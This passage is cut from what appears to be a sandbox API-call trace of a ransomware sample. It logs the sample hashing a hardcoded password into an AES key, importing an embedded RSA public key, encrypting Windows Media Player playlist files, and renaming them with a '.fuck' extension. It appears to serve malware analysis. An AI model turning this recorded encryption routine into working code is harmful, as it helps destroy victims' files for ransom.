pdwDataLen=0x2b9cabc*=0x18, dwBufLen=0x80 | out: pbData=0x2f24cf0*, pdwDataLen=0x2b9cabc*=0x80) returned 1 [0268.142] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f24cf0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x2f24cf0*, lpNumberOfBytesWritten=0x2b9cacc*=0x80, lpOverlapped=0x0) returned 1 [0268.147] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0268.151] CryptEncrypt (in: hKey=0x29388b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0268.151] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0268.154] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x184, lpOverlapped=0x0) returned 1 [0268.154] CryptEncrypt (in: hKey=0x29388b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x184, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x190) returned 1 [0268.154] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x190, lpOverlapped=0x0) returned 1 [0268.154] CloseHandle (hObject=0x5d50) returned 1 [0268.155] CloseHandle (hObject=0x5d4c) returned 1 [0268.155] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\04_Music_played_in_the_last_month.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\04_music_played_in_the_last_month.wpl.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\04_music_played_in_the_last_month.wpl"), bFailIfExists=0) returned 1 [0268.159] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\04_Music_played_in_the_last_month.wpl", dwFileAttributes=0x0) returned 1 [0268.159] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\04_Music_played_in_the_last_month.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\04_music_played_in_the_last_month.wpl.gsg")) returned 1 [0268.161] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\04_music_played_in_the_last_month.wpl"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\04_Music_played_in_the_last_month.wpl.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\04_music_played_in_the_last_month.wpl.fuck")) returned 1 [0268.162] CryptDestroyHash (hHash=0x29386f8) returned 1 [0268.162] CryptDestroyKey (hKey=0x29388b8) returned 1 [0268.162] CryptReleaseContext (hProv=0x2f249c0, dwFlags=0x0) returned 1 [0268.162] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0268.162] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9dac8 | out: lpSystemTimeAsFileTime=0x2b9dac8) [0268.162] GetLastError () returned 0x0 [0268.162] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\05_pictures_taken_in_the_last_month.wpl")) returned 0x20 [0268.163] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\05_Pictures_taken_in_the_last_month.wpl", dwFileAttributes=0x80) returned 1 [0268.163] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\05_pictures_taken_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0268.164] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\05_Pictures_taken_in_the_last_month.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\05_pictures_taken_in_the_last_month.wpl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0268.165] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\05_Pictures_taken_in_the_last_month.wpl.gsg", dwFileAttributes=0x2) returned 1 [0268.166] CryptAcquireContextA (in: phProv=0x2b9cac4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9cac4*=0x2f25240) returned 1 [0268.168] CryptCreateHash (in: hProv=0x2f25240, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9cac8 | out: phHash=0x2b9cac8) returned 1 [0268.168] lstrlenA (lpString="ENarQtORUWLZSNndbbyWVVoTzMlQm") returned 29 [0268.168] CryptHashData (hHash=0x2938378, pbData=0x28cb3c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0268.168] CryptDeriveKey (in: hProv=0x2f25240, Algid=0x6610, hBaseData=0x2938378, dwFlags=0x1000000, phKey=0x2b9cab4 | out: phKey=0x2b9cab4*=0x29388b8) returned 1 [0268.168] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0268.169] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9cad0, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac | out: pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac) returned 1 [0268.169] CryptAcquireContextA (in: phProv=0x2b9cac0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9cac0*=0x2f252c8) returned 1 [0268.169] CryptImportPublicKeyInfo (in: hCryptProv=0x2f252c8, dwCertEncodingType=0x1, pInfo=0x2f30f10*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f30f40*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f30f48*, PublicKey.cUnusedBits=0x0), phKey=0x2b9cab8 | out: phKey=0x2b9cab8*=0x2938978) returned 1 [0268.169] CryptEncrypt (in: hKey=0x2938978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9caa8*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9caa8*=0x80) returned 1 [0268.169] CryptEncrypt (in: hKey=0x2938978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f25350*, pdwDataLen=0x2b9cabc*=0x18, dwBufLen=0x80 | out: pbData=0x2f25350*, pdwDataLen=0x2b9cabc*=0x80) returned 1 [0268.169] WriteFile (in: hFile=0x5d50, lpBuffer=0x2f25350*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x2f25350*, lpNumberOfBytesWritten=0x2b9cacc*=0x80, lpOverlapped=0x0) returned 1 [0268.170] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x31d, lpOverlapped=0x0) returned 1 [0268.173] CryptEncrypt (in: hKey=0x29388b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x31d, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x320) returned 1 [0268.173] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x320, lpOverlapped=0x0) returned 1 [0268.175] CloseHandle (hObject=0x5d4c) returned 1 [0268.175] CloseHandle (hObject=0x5d50) returned 1 [0268.175] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\05_Pictures_taken_in_the_last_month.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\05_pictures_taken_in_the_last_month.wpl.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\05_pictures_taken_in_the_last_month.wpl"), bFailIfExists=0) returned 1 [0268.182] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\05_Pictures_taken_in_the_last_month.wpl", dwFileAttributes=0x0) returned 1 [0268.182] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\05_Pictures_taken_in_the_last_month.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\05_pictures_taken_in_the_last_month.wpl.gsg")) returned 1 [0268.184] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\05_pictures_taken_in_the_last_month.wpl"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\05_Pictures_taken_in_the_last_month.wpl.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\05_pictures_taken_in_the_last_month.wpl.fuck")) returned 1 [0268.185] CryptDestroyHash (hHash=0x2938378) returned 1 [0268.185] CryptDestroyKey (hKey=0x29388b8) returned 1 [0268.185] CryptReleaseContext (hProv=0x2f25240, dwFlags=0x0) returned 1 [0268.185] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0268.186] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9dac8 | out: lpSystemTimeAsFileTime=0x2b9dac8) [0268.186] GetLastError () returned 0x0 [0268.186] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\06_pictures_rated_4_or_5_stars.wpl")) returned 0x20 [0268.186] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\06_Pictures_rated_4_or_5_stars.wpl", dwFileAttributes=0x80) returned 1 [0268.187] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\06_pictures_rated_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0268.188] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\06_Pictures_rated_4_or_5_stars.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\06_pictures_rated_4_or_5_stars.wpl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0268.189] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\06_Pictures_rated_4_or_5_stars.wpl.gsg", dwFileAttributes=0x2) returned 1 [0268.189] CryptAcquireContextA (in: phProv=0x2b9cac4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9cac4*=0x2f247a0) returned 1 [0268.192] CryptCreateHash (in: hProv=0x2f247a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9cac8 | out: phHash=0x2b9cac8) returned 1 [0268.192] lstrlenA (lpString="ENarQtORUWLZSNndbbyWVVoTzMlQm") returned 29 [0268.192] CryptHashData (hHash=0x29383f8, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0268.192] CryptDeriveKey (in: hProv=0x2f247a0, Algid=0x6610, hBaseData=0x29383f8, dwFlags=0x1000000, phKey=0x2b9cab4 | out: phKey=0x2b9cab4*=0x29386f8) returned 1 [0268.192] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0268.192] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9cad0, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac | out: pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac) returned 1 [0268.192] CryptAcquireContextA (in: phProv=0x2b9cac0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9cac0*=0x2f25570) returned 1 [0268.193] CryptImportPublicKeyInfo (in: hCryptProv=0x2f25570, dwCertEncodingType=0x1, pInfo=0x2f2fd30*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f2fd60*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f2fd68*, PublicKey.cUnusedBits=0x0), phKey=0x2b9cab8 | out: phKey=0x2b9cab8*=0x29388b8) returned 1 [0268.193] CryptEncrypt (in: hKey=0x29388b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9caa8*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9caa8*=0x80) returned 1 [0268.193] CryptEncrypt (in: hKey=0x29388b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f24828*, pdwDataLen=0x2b9cabc*=0x18, dwBufLen=0x80 | out: pbData=0x2f24828*, pdwDataLen=0x2b9cabc*=0x80) returned 1 [0268.193] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f24828*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x2f24828*, lpNumberOfBytesWritten=0x2b9cacc*=0x80, lpOverlapped=0x0) returned 1 [0268.195] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x311, lpOverlapped=0x0) returned 1 [0268.197] CryptEncrypt (in: hKey=0x29386f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x311, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x320) returned 1 [0268.197] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x320, lpOverlapped=0x0) returned 1 [0268.205] CloseHandle (hObject=0x5d50) returned 1 [0268.205] CloseHandle (hObject=0x5d4c) returned 1 [0268.205] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\06_Pictures_rated_4_or_5_stars.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\06_pictures_rated_4_or_5_stars.wpl.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\06_pictures_rated_4_or_5_stars.wpl"), bFailIfExists=0) returned 1 [0268.209] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\06_Pictures_rated_4_or_5_stars.wpl", dwFileAttributes=0x0) returned 1 [0268.209] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\06_Pictures_rated_4_or_5_stars.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\06_pictures_rated_4_or_5_stars.wpl.gsg")) returned 1 [0268.211] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\06_pictures_rated_4_or_5_stars.wpl"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\06_Pictures_rated_4_or_5_stars.wpl.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\06_pictures_rated_4_or_5_stars.wpl.fuck")) returned 1 [0268.212] CryptDestroyHash (hHash=0x29383f8) returned 1 [0268.213] CryptDestroyKey (hKey=0x29386f8) returned 1 [0268.213] CryptReleaseContext (hProv=0x2f247a0, dwFlags=0x0) returned 1 [0268.213] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0268.213] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9dac8 | out: lpSystemTimeAsFileTime=0x2b9dac8) [0268.215] GetLastError () returned 0x0 [0268.215] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\07_tv_recorded_in_the_last_week.wpl")) returned 0x20 [0268.216] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\07_TV_recorded_in_the_last_week.wpl", dwFileAttributes=0x80) returned 1 [0268.217] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\07_tv_recorded_in_the_last_week.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0268.218] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\07_TV_recorded_in_the_last_week.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\07_tv_recorded_in_the_last_week.wpl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0268.219] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\07_TV_recorded_in_the_last_week.wpl.gsg", dwFileAttributes=0x2) returned 1 [0268.221] CryptAcquireContextA (in: phProv=0x2b9cac4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9cac4*=0x2f24b58) returned 1 [0268.224] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9cac8 | out: phHash=0x2b9cac8) returned 1 [0268.224] lstrlenA (lpString="ENarQtORUWLZSNndbbyWVVoTzMlQm") returned 29 [0268.224] CryptHashData (hHash=0x2e18128, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0268.224] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9cab4 | out: phKey=0x2b9cab4*=0x2e18828) returned 1 [0268.224] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0268.224] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9cad0, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac | out: pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac) returned 1 [0268.224] CryptAcquireContextA (in: phProv=0x2b9cac0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9cac0*=0x2f247a0) returned 1 [0268.225] CryptImportPublicKeyInfo (in: hCryptProv=0x2f247a0, dwCertEncodingType=0x1, pInfo=0x2f302e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f30310*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f30318*, PublicKey.cUnusedBits=0x0), phKey=0x2b9cab8 | out: phKey=0x2b9cab8*=0x2e180e8) returned 1 [0268.225] CryptEncrypt (in: hKey=0x2e180e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9caa8*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9caa8*=0x80) returned 1 [0268.236] CryptEncrypt (in: hKey=0x2e180e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f248b0*, pdwDataLen=0x2b9cabc*=0x18, dwBufLen=0x80 | out: pbData=0x2f248b0*, pdwDataLen=0x2b9cabc*=0x80) returned 1 [0268.236] WriteFile (in: hFile=0x5d50, lpBuffer=0x2f248b0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x2f248b0*, lpNumberOfBytesWritten=0x2b9cacc*=0x80, lpOverlapped=0x0) returned 1 [0268.237] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0268.239] CryptEncrypt (in: hKey=0x2e18828, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0268.239] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 